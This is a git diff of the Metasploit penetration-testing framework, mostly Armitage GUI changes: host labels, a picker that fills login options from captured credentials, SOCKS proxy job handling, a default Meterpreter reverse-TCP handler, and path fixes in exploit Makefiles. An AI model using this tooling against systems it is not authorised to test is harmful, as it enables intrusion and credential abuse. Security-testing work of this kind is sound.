# keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose.
$REMOTE = iff($1 eq "127.0.0.1", $null, 1);
$REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1);
$flag = 10;
while ($flag) {
@ -160,7 +160,7 @@ sub _connectToMetasploit {
}
# connecting locally? go to Metasploit directly...
if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") {
if ($REMOTE is $null) {
$client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug];
$aclient = [new RpcAsync: $client];
$mclient = $client;
@ -239,10 +239,6 @@ sub _connectToMetasploit {
[$progress setNote: "Connected: ..."];
[$progress setProgress: 60];
if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') {
showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server.");
}
dispatchEvent(&postSetup);
}, \$progress));
}

8
external/source/armitage/scripts/attacks.sl vendored
View File

@ -679,12 +679,20 @@ sub addFileListener {
$actions["SigningCert"] = $actions["*FILE*"];
$actions["SigningKey"] = $actions["*FILE*"];
$actions["Wordlist"] = $actions["*FILE*"];
$actions["EXE::Custom"] = $actions["*FILE*"];
$actions["EXE::Template"] = $actions["*FILE*"];
$actions["WORDLIST"] = $actions["*FILE*"];
$actions["REXE"] = $actions["*FILE*"];
# set up an action to choose a session
$actions["SESSION"] = lambda(&chooseSession);
# helpers to set credential pairs from database... yay?
$actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
$actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
$actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
$actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
# set up an action to pop up a file chooser for different file type values.
$actions["RHOST"] = {
local('$title $temp');

2
external/source/armitage/scripts/gui.sl vendored
View File

@ -446,7 +446,7 @@ sub quickListDialog {
$button = [new JButton: $2];
[$button addActionListener: lambda({
[$callback : [$model getSelectedValueFromColumn: $table, $lead]];
[$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model];
[$dialog setVisible: 0];
}, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])];

67
external/source/armitage/scripts/jobs.sl vendored
View File

@ -16,47 +16,7 @@ import java.awt.event.*;
import ui.*;
sub manage_proxy_server {
manage_job("Auxiliary: server/socks4a",
# start server function
{
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null);
},
# description of job (for job kill function)
{
local('$host $port');
($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT"));
return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?";
}
);
}
sub report_url {
find_job($name, {
if ($1 == -1) {
showError("Server not found");
}
else {
local('$job $host $port $uripath');
$job = call($client, "job.info", $1);
($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT"));
$uripath = $job["info"]["uripath"];
local('$dialog $text $ok');
$dialog = dialog("Output", 320, 240);
$text = [new JTextArea];
[$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"];
$button = [new JButton: "Ok"];
[$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)];
[$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]];
[$dialog add: center($button), [BorderLayout SOUTH]];
[$dialog setVisible: 1];
}
});
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1);
}
sub find_job {
@ -80,26 +40,6 @@ sub find_job {
}, $name => $1, $function => $2));
}
# manage_job(job name, { start job function }, { job dialog info })
sub manage_job {
local('$name $startf $stopf');
($name, $startf, $stopf) = @_;
find_job($name, lambda({
if ($1 == -1) {
[$startf];
}
else {
local('$job $confirm $foo $confirm');
$job = call($client, "job.info", $1);
$confirm = askYesNo([$stopf : $1, $job], "Stop Job");
if ($confirm eq "0") {
call_async($client, "job.stop", $1);
}
}
}, \$startf, \$stopf));
}
sub generatePayload {
local('$file');
$file = saveFile2();
@ -450,6 +390,11 @@ sub _launch_dialog {
elog("launched DNS enum for $domain");
}
}
else if ($type eq "auxiliary" && $command eq "server/socks4a") {
local('$host $port');
($host, $port) = values($options, @('SRVHOST', 'SRVPORT'));
elog("started SOCKS proxy server at $host $+ : $+ $port");
}
launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]);
}

23
external/source/armitage/scripts/menus.sl vendored
View File

@ -54,6 +54,29 @@ sub host_selected_items {
item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
item($h, "Set Label...", 'S', lambda({
# calculate preexisting label to prompt with
local('$label %l $host');
# get a label
foreach $host ($hosts) {
if ($label eq "") {
$label = getHostLabel($host);
}
}
# ask for a label
$label = ask("Set label to:", $label);
if ($label !is $null) {
foreach $host ($hosts) {
%l[$host] = ["$label" trim];
}
call_async($mclient, "db.report_labels", %l);
}
}, $hosts => $2));
separator($h);
item($h, "Remove Host", 'R', clearHostFunction($2));
}

31
external/source/armitage/scripts/passhash.sl vendored
View File

@ -372,3 +372,34 @@ sub launchBruteForce {
[$console start];
}, $type => $1, $module => $2, $options => $3, $title => $4));
}
sub credentialHelper {
thread(lambda({
[Thread yield];
# gather our credentials please
local('$creds $cred @creds');
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
foreach $cred ($creds) {
if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") {
push(@creds, $cred);
}
}
# pop up a dialog to let the user choose their favorite set
quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({
if ($1 eq "") {
return;
}
local('$user $pass');
$user = [$3 getSelectedValueFromColumn: $2, 'user'];
$pass = [$3 getSelectedValueFromColumn: $2, 'pass'];
[$model setValueForKey: $USER, "Value", $user];
[$model setValueForKey: $PASS, "Value", $pass];
[$model fireListeners];
}, \$callback, \$model, \$USER, \$PASS));
}, \$USER, \$PASS, \$model, $callback => $4));
}

3
external/source/armitage/scripts/server.sl vendored
View File

@ -403,9 +403,6 @@ sub main {
# we need this global to be set so our reverse listeners work as expected.
$MY_ADDRESS = $host;
# make sure clients know a team server is present. can't happen async.
call($client, "core.setg", "ARMITAGE_TEAM", '1');
#
# setup the client cache
#

12
external/source/armitage/scripts/targets.sl vendored
View File

@ -21,6 +21,10 @@ sub getHostOS {
return iff($1 in %hosts, %hosts[$1]['os_name'], $null);
}
sub getHostLabel {
return iff($1 in %hosts, %hosts[$1]['label'], $null);
}
sub getSessions {
return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']);
}
@ -122,7 +126,7 @@ on sessions {
}
if ($host['show'] eq "1") {
push(@nodes, @($id, describeHost($host), showHost($host), $tooltip));
push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip));
}
}
@ -130,14 +134,14 @@ on sessions {
}
sub refreshGraph {
local('$node $id $description $icons $tooltip $highlight');
local('$node $id $label $description $icons $tooltip $highlight');
# update everything...
[$graph start];
# do the hosts?
foreach $node (@nodes) {
($id, $description, $icons, $tooltip) = $node;
[$graph addNode: $id, $description, $icons, $tooltip];
($id, $label, $description, $icons, $tooltip) = $node;
[$graph addNode: $id, $label, $description, $icons, $tooltip];
}
# update the routes

14
external/source/armitage/scripts/util.sl vendored
View File

@ -159,12 +159,15 @@ sub setg {
}
sub createDefaultHandler {
warn("Creating a default reverse handler...");
# setup a handler for meterpreter
setg("LPORT", randomPort());
local('$port');
$port = randomPort();
setg("LPORT", $port);
warn("Creating a default reverse handler... 0.0.0.0: $+ $port");
call_async($client, "module.execute", "exploit", "multi/handler", %(
PAYLOAD => "windows/meterpreter/reverse_tcp",
LHOST => "0.0.0.0",
LPORT => $port,
ExitOnSession => "false"
));
}
@ -307,7 +310,12 @@ sub startMetasploit {
savePreferences();
}
if ("*apps*pro*" iswm $msfdir) {
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null];
}
else {
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
}
$data = join("\r\n", readAll($handle, -1));
closef($handle);
@ -416,7 +424,7 @@ sub connectDialog {
[$dialog setVisible: 0];
connectToMetasploit($h, $p, $u, $s);
if ($h eq "127.0.0.1" || $h eq "localhost") {
if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") {
try {
closef(connect("127.0.0.1", $p, 1000));
}

23
external/source/armitage/scripts/workspaces.sl vendored
View File

@ -33,7 +33,7 @@ sub listWorkspaces {
$dialog = [new JPanel];
[$dialog setLayout: [new BorderLayout]];
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @());
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @());
updateWorkspaceList($table, $model);
[$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]];
@ -88,15 +88,16 @@ sub workspaceDialog {
local('$table $model');
($table, $model) = $2;
local('$dialog $name $host $ports $os $button $session');
local('$dialog $name $host $ports $os $button $session $label');
$dialog = dialog($title, 640, 480);
[$dialog setLayout: [new GridLayout: 6, 1]];
[$dialog setLayout: [new GridLayout: 7, 1]];
$name = [new ATextField: $1['name'], 16];
[$name setEnabled: $enable];
$host = [new ATextField: $1['hosts'], 16];
$ports = [new ATextField: $1['ports'], 16];
$os = [new ATextField: $1['os'], 16];
$label = [new ATextField: $1['labels'], 16];
$session = [new JCheckBox: "Hosts with sessions only"];
if ($1['session'] eq 1) {
[$session setSelected: 1];
@ -108,6 +109,7 @@ sub workspaceDialog {
[$dialog add: label_for("Hosts:", 60, $host)];
[$dialog add: label_for("Ports:", 60, $ports)];
[$dialog add: label_for("OS:", 60, $os)];
[$dialog add: label_for("Labels:", 60, $label)];
[$dialog add: $session];
[$dialog add: center($button)];
@ -116,15 +118,16 @@ sub workspaceDialog {
[$button addActionListener: lambda({
# yay, we have a dialog...
local('$n $h $p $o $s @workspaces $ws $temp');
local('$n $h $p $o $s $l @workspaces $ws $temp');
$n = [[$name getText] trim];
$h = [strrep([$host getText], '*', '%', '?', '_') trim];
$p = [[$ports getText] trim];
$o = [strrep([$os getText], '*', '%', '?', '_') trim];
$l = [[$label getText] trim];
$s = [$session isSelected];
# save the new menu
$ws = workspace($n, $h, $p, $o, $s);
$ws = workspace($n, $h, $p, $o, $s, $l);
@workspaces = workspaces();
foreach $temp (@workspaces) {
if ($temp["name"] eq $n) {
@ -140,7 +143,7 @@ sub workspaceDialog {
updateWorkspaceList($table, $model);
[$dialog setVisible: 0];
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)];
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)];
}
sub reset_workspace {
@ -199,16 +202,16 @@ sub set_workspace {
}
sub workspace {
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5);
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6);
}
sub workspaces {
local('$ws @r $name $host $port $os $session $workspace');
local('$ws @r $name $host $port $os $session $workspace $label');
$ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]);
foreach $workspace ($ws) {
if ($workspace ne "") {
($name, $host, $port, $os, $session) = split('@@', $workspace);
push(@r, workspace($name, $host, $port, $os, $session));
($name, $host, $port, $os, $session, $label) = split('@@', $workspace);
push(@r, workspace($name, $host, $port, $os, $session, $label));
}
}
return @r;

1
external/source/armitage/src/armitage/ArmitageApplication.java vendored
View File

@ -196,6 +196,7 @@ public class ArmitageApplication extends JFrame {
r.setLayout(new BorderLayout());
r.add(t.component, BorderLayout.CENTER);
r.pack();
t.component.validate();
r.addWindowListener(new WindowAdapter() {
public void windowClosing(WindowEvent ev) {

5
external/source/armitage/src/cortana/Loader.java vendored
View File

@ -15,7 +15,7 @@ public class Loader implements Loadable {
protected ScriptLoader loader;
protected Hashtable shared = new Hashtable();
protected ScriptVariables vars = new ScriptVariables();
protected Object[] passMe = new Object[2];
protected Object[] passMe = new Object[3];
protected List scripts = new LinkedList();
public void unsetDebugLevel(int flag) {
@ -51,10 +51,11 @@ public class Loader implements Loadable {
}
}
public void passObjects(Object o, Object p) {
public void passObjects(Object o, Object p, Object q) {
synchronized (this) {
passMe[0] = o;
passMe[1] = p;
passMe[2] = q;
}
}

2
external/source/armitage/src/cortana/Main.java vendored
View File

@ -69,7 +69,7 @@ public class Main implements Runnable, CortanaPipe.CortanaPipeListener {
try {
Object conns[] = setupConnections(host, port, user, pass, nick);
//new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false);
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host);
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]);
new Thread(this).start();
}
catch (java.lang.RuntimeException rex) {

15
external/source/armitage/src/graph/NetworkGraph.java vendored
View File

@ -453,17 +453,26 @@ public class NetworkGraph extends JComponent implements ActionListener {
protected Map tooltips = new HashMap();
public Object addNode(String id, String label, Image image, String tooltip) {
public Object addNode(String id, String label, String description, Image image, String tooltip) {
nodeImages.put(id, image);
if (label.length() > 0) {
if (description.length() > 0) {
description += "\n" + label;
}
else {
description = label;
}
}
mxCell cell;
if (!nodes.containsKey(id)) {
cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97);
cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97);
nodes.put(id, cell);
}
else {
cell = (mxCell)nodes.get(id);
cell.setValue(label);
cell.setValue(description);
}
nodes.touch(id);

144
external/source/armitage/src/msf/DatabaseImpl.java vendored
View File

@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection {
protected String workspaceid = "0";
protected String hFilter = null;
protected String sFilter = null;
protected String[] lFilter = null;
protected Route[] rFilter = null;
protected String[] oFilter = null;
protected int hindex = 0;
protected int sindex = 0;
/* keep track of labels associated with each host */
protected Map labels = new HashMap();
/* define the maximum hosts in a workspace */
protected int maxhosts = 512;
@ -135,6 +139,20 @@ public class DatabaseImpl implements RpcConnection {
return false;
}
private boolean checkLabel(String host) {
if (!labels.containsKey(host))
return false;
String label_l = (labels.get(host) + "").toLowerCase();
for (int x = 0; x < lFilter.length; x++) {
if (label_l.indexOf(lFilter[x]) != -1) {
return true;
}
}
return false;
}
private boolean checkOS(String os) {
String os_l = os.toLowerCase();
@ -145,11 +163,76 @@ public class DatabaseImpl implements RpcConnection {
return false;
}
public List filterByRoute(List rows, int max) {
if (rFilter != null || oFilter != null) {
protected void loadLabels() {
try {
/* query database for label data */
List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'");
if (rows.size() == 0)
return;
/* extract our BASE64 encoded data */
String data = ((Map)rows.get(0)).get("data") + "";
System.err.println("Read: " + data.length() + " bytes");
/* turn our data into raw data */
byte[] raw = Base64.decode(data);
/* deserialize our notes data */
ByteArrayInputStream store = new ByteArrayInputStream(raw);
ObjectInputStream handle = new ObjectInputStream(store);
Map temp = (Map)(handle.readObject());
handle.close();
store.close();
/* merge with our new map */
labels.putAll(temp);
}
catch (Exception ex) {
ex.printStackTrace();
}
}
protected void mergeLabels(Map l) {
/* accept any label values and merge them into our global data set */
Iterator i = l.entrySet().iterator();
while (i.hasNext()) {
Map.Entry entry = (Map.Entry)i.next();
if ("".equals(entry.getValue())) {
labels.remove(entry.getKey() + "");
}
else {
labels.put(entry.getKey() + "", entry.getValue() + "");
}
}
}
/* add labels to our hosts */
public List addLabels(List rows) {
if (labels.size() == 0)
return rows;
Iterator i = rows.iterator();
while (i.hasNext()) {
Map entry = (Map)i.next();
String address = (entry.containsKey("address") ? entry.get("address") : entry.get("host")) + "";
if (labels.containsKey(address)) {
entry.put("label", labels.get(address) + "");
}
else {
entry.put("label", "");
}
}
return rows;
}
public List filterByRoute(List rows, int max) {
if (rFilter != null || oFilter != null || lFilter != null) {
Iterator i = rows.iterator();
while (i.hasNext()) {
Map entry = (Map)i.next();
/* make sure the address is within a route we care about */
if (rFilter != null && entry.containsKey("address")) {
if (!checkRoute(entry.get("address") + "")) {
i.remove();
@ -163,9 +246,26 @@ public class DatabaseImpl implements RpcConnection {
}
}
/* make sure the host is something we care about too */
if (oFilter != null && entry.containsKey("os_name")) {
if (!checkOS(entry.get("os_name") + ""))
if (!checkOS(entry.get("os_name") + "")) {
i.remove();
continue;
}
}
/* make sure the host has the right label */
if (lFilter != null && entry.containsKey("address")) {
if (!checkLabel(entry.get("address") + "")) {
i.remove();
continue;
}
}
else if (lFilter != null && entry.containsKey("host")) {
if (!checkLabel(entry.get("host") + "")) {
i.remove();
continue;
}
}
}
@ -180,6 +280,7 @@ public class DatabaseImpl implements RpcConnection {
public void connect(String dbstring, String user, String password) throws Exception {
db = DriverManager.getConnection(dbstring, user, password);
setWorkspace("default");
loadLabels();
}
public Object execute(String methodName) throws IOException {
@ -192,8 +293,8 @@ public class DatabaseImpl implements RpcConnection {
/* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and
filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting
and limit the size of the final result there. */
int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000;
int limit2 = rFilter == null && oFilter == null ? maxservices : 100000;
int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000;
int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000;
temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid);
@ -235,7 +336,7 @@ public class DatabaseImpl implements RpcConnection {
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices));
}
else if (methodName.equals("db.hosts")) {
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts));
result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts)));
}
else {
result.put(methodName.substring(3), executeQuery(query));
@ -332,6 +433,7 @@ public class DatabaseImpl implements RpcConnection {
rFilter = null;
oFilter = null;
lFilter = null;
List hosts = new LinkedList();
List srvcs = new LinkedList();
@ -385,6 +487,11 @@ public class DatabaseImpl implements RpcConnection {
oFilter = (values.get("os") + "").toLowerCase().split(",\\s*");
}
/* label filter */
if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) {
lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*");
}
if (hosts.size() == 0) {
hFilter = null;
}
@ -406,6 +513,31 @@ public class DatabaseImpl implements RpcConnection {
result.put("rows", new Integer(stmt.executeUpdate()));
return result;
}
else if (methodName.equals("db.report_labels")) {
/* merge out global label data */
Map values = (Map)params[0];
mergeLabels(values);
/* delete our saved label data */
executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'");
/* serialize our notes data */
ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128);
ObjectOutputStream handle = new ObjectOutputStream(store);
handle.writeObject(labels);
handle.close();
store.close();
String data = Base64.encode(store.toByteArray());
/* save our label data */
PreparedStatement stmt = null;
stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)");
stmt.setString(1, data);
stmt.executeUpdate();
return new HashMap();
}
else if (methodName.equals("db.report_host")) {
Map values = (Map)params[0];
String host = values.get("host") + "";

2
external/source/armitage/src/msf/RpcCacheImpl.java vendored
View File

@ -106,6 +106,8 @@ public class RpcCacheImpl implements Runnable {
key.append(temp.get("ports"));
key.append(";");
key.append(temp.get("session"));
key.append(";");
key.append(temp.get("labels"));
return key.toString();
}

16
external/source/armitage/src/table/NetworkTable.java vendored
View File

@ -52,7 +52,7 @@ public class NetworkTable extends JComponent implements ActionListener {
public NetworkTable(Properties display) {
this.display = display;
model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256);
model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256);
table = new ATable(model);
TableRowSorter sorter = new TableRowSorter(model);
sorter.toggleSortOrder(1);
@ -79,12 +79,13 @@ public class NetworkTable extends JComponent implements ActionListener {
};
sorter.setComparator(1, hostCompare);
sorter.setComparator(3, hostCompare);
sorter.setComparator(4, hostCompare);
table.setRowSorter(sorter);
table.setColumnSelectionAllowed(false);
table.getColumn("Address").setPreferredWidth(125);
table.getColumn("Label").setPreferredWidth(125);
table.getColumn("Pivot").setPreferredWidth(125);
table.getColumn(" ").setPreferredWidth(32);
table.getColumn(" ").setMaxWidth(32);
@ -95,7 +96,7 @@ public class NetworkTable extends JComponent implements ActionListener {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col);
if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
component.setFont(component.getFont().deriveFont(Font.BOLD));
}
else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) {
@ -252,16 +253,17 @@ public class NetworkTable extends JComponent implements ActionListener {
public void addActionForKeySetting(String key, String dvalue, Action action) {
}
public Object addNode(String id, String label, Image image, String tooltip) {
public Object addNode(String id, String label, String description, Image image, String tooltip) {
if (id == null || label == null)
return null;
HashMap map = new HashMap();
map.put("Address", id);
if (label.indexOf(id) > -1)
label = label.substring(id.length());
map.put("Description", label);
if (description.indexOf(id) > -1)
description = description.substring(id.length());
map.put("Label", label);
map.put("Description", description);
map.put("Tooltip", tooltip);
map.put("Image", image);
map.put(" ", tooltip);

6
external/source/armitage/src/ui/ATable.java vendored
View File

@ -26,6 +26,12 @@ public class ATable extends JTable {
specialitems.add("WORDLIST");
specialitems.add("SESSION");
specialitems.add("REXE");
specialitems.add("EXE::Custom");
specialitems.add("EXE::Template");
specialitems.add("USERNAME");
specialitems.add("PASSWORD");
specialitems.add("SMBUser");
specialitems.add("SMBPass");
return new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {

2
external/source/armitage/src/ui/ZoomableImage.java vendored
View File

@ -54,6 +54,8 @@ public class ZoomableImage extends JLabel {
check(ev);
}
});
setHorizontalAlignment(SwingConstants.CENTER);
}
protected void updateIcon() {

26
external/source/armitage/whatsnew.txt vendored
View File

@ -1,6 +1,32 @@
Armitage Changelog
==================
23 Jan 13 (tested against msf 16351)
---------
- Added helpers to set EXE::Custom and EXE::Template options.
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
check if a proxy server is up was deadlock prone. Removed it.
- Starting SOCKS Proxy module now opens a tab displaying the module
start process. An event is posted to the event log too.
- Created an option helper to select credentials for SMBUser, SMBPass,
USERNAME, and PASSWORD.
- Added a feature to label hosts. A label will show up in its own column
in table view or below all info in graph view. Any team member may
change a label through [host] -> host -> Set Label. You may also use
dynamic workspaces to show hosts with certain labels attached.
- Fixed bad things happening when connecting Armitage to 'localhost' and
not '127.0.0.1'.
- Screenshots and Webcam shots are now centered in their tab.
- Added an alternate .bat file to start msfrpcd on Windows in the
Metasploit 4.5 installer's environment.
- Added a color-style for [!] warning messages
Cortana Updates (for scripters)
--------
- &handler function now works as advertised.
- Cortana now avoids use of core.setg
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option

4
external/source/exploits/cve-2012-5076_2/Makefile vendored
View File

@ -11,8 +11,8 @@ CLASSES = \
all: $(CLASSES:.java=.class)
install:
mv Exploit.class ../../../../data/exploits/cve-2013-0422/
mv B.class ../../../../data/exploits/cve-2013-0422/
mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/
mv B.class ../../../../data/exploits/cve-2012-5076_2/
clean:
rm -rf *.class

4
external/source/exploits/cve-2012-5088/Makefile vendored
View File

@ -9,8 +9,8 @@ CLASSES = \
all: $(CLASSES:.java=.class)
install:
mv Exploit.class ../../../../data/exploits/cve-2013-0422/
mv B.class ../../../../data/exploits/cve-2013-0422/
mv Exploit.class ../../../../data/exploits/cve-2012-5088/
mv B.class ../../../../data/exploits/cve-2012-5088/
clean:
rm -rf *.class

6
lib/msf/core/db.rb
View File

@ -679,7 +679,7 @@ class DBManager
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session and session.via_exploit == "exploit/multi/handler"
if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
@ -696,7 +696,7 @@ class DBManager
mod = framework.modules.create(session.via_exploit)
if session.via_exploit == "exploit/multi/handler"
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
else
@ -720,7 +720,7 @@ class DBManager
vuln = framework.db.report_vuln(vuln_info)
if session.via_exploit == "exploit/multi/handler"
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
via_exploit = sess_data[:datastore]['ParentModule']
else
via_exploit = session.via_exploit

321
lib/msf/ui/banner.rb
View File

@ -10,301 +10,52 @@ module Ui
module Banner
Logos =
[
%Q{
%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
%bldthe matrix has you%clr
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \\
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
%clr},
%Q{%whi
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \\
;@'. __*__,." \\|--- \\_____________/
'(.,...."/
%clr},
'
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
',
'
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\
',
%Q{
%whiIIIIII %reddTb.dTb%clr _.---._
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
%whi II %red6. .P%clr : .' / | \ `. :
%whi II %red'T;. .;P'%clr '.' / | \ `.'
%whi II %red'T; ;P'%clr `. / | \ .'
%whiIIIIII %red'YvP'%clr `-.__|__.-'
I love shells --egypt
},
'
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
',
'
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
',
'%clr
______________________________________________________________________________
| |
| %bld3Kom SuperHack II Logon%clr |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ %redsecurity%clr ] |
| |
| Password: [ ] |
| |
| |
| |
